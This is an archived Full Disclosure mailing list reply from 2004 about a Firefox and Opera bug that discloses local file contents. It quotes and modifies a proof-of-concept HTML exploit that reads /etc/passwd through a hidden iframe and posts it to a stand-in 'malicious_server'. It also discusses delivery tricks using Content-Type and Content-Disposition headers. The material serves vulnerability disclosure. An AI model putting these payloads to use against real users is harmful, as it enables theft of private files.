Full Disclosure mailing list archives
Re: Disclosure of local file content in Mozilla Firefox and Opera
From: Juergen Schmidt <ju () heisec de>
Date: Mon, 6 Dec 2004 19:30:59 +0100 (CET)
On Mon, 6 Dec 2004, Giovanni Delvecchio wrote:
PoC: === Read a local file by inner.HTML method: -------------------------------------------------------- <HTML> <BODY onLoad="ReadFileContent()" > <iframe name="local_file" src="file:///etc/passwd" height=0 width=0></iframe> <form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain"> <input name="content" type="hidden" size="300" > </form> <script> function ReadFileContent(){ alert(local_file.document.all(0).innerHTML); document.module.content.value+=local_file.document.all(0).innerHTML; //send content to malicious_server document.module.submit(); } </script> </body> </html>
While I can confirm, that this works with FF 1.0, older versions like 0.9.3 and Mozilla 1.7.3 choked on document.all, which isn't really supported by Mozillas DOM. I got it to work with document.firstChild: --- <HTML> <BODY onLoad="ReadFileContent()" > <iframe id="local_file" name="local_file" src="file:///etc/passwd" height=0 width=0> </iframe> <script> function ReadFileContent(){ alert(local_file.document.firstChild.innerHTML); } </script> </body></html> --- This worked with all versions of Mozilla and Firefox I checked.
Possible method of remote exploitation: ================================ Question: How could a malicious remote user exploit it ? My idea is the following:
After that the user "victim" has required http://maliciuos_server/page.htm, if malicious_server responds with a page containing an unknown Content-Type field ( for example text/html. ,note the dot) ,the browser will show a dialog window with some options (open, save, cancel). Choosing "Open" to view this page, it will be downloaded and opened in local ; javascript code will be executed in local context.
I am offered to "Open with GNU Emacs (default)" under Linux -- but this may have been configured by me a long time ago. On Windows, I can have the default opener set to my browser by adding: Content-Disposition: attachment; filename=cttest.html (the .html is important). bye, ju -- Juergen Schmidt Chefredakteur heise Security www.heisec.de Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail ju () heisec de GPG-Key: 0x38EA4970, 5D7B 476D 84D5 94FF E7C5 67BE F895 0A18 38EA 4970 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Disclosure of local file content in Mozilla Firefox and Opera Giovanni Delvecchio (Dec 06)
- Re: Disclosure of local file content in Mozilla Firefox and Opera Juergen Schmidt (Dec 06)
- <Possible follow-ups>
- RE: Disclosure of local file content in Mozilla Firefox and Opera Thor Larholm (Dec 06)
- RE: Disclosure of local file content in Mozilla Firefox and Opera Giovanni Delvecchio (Dec 06)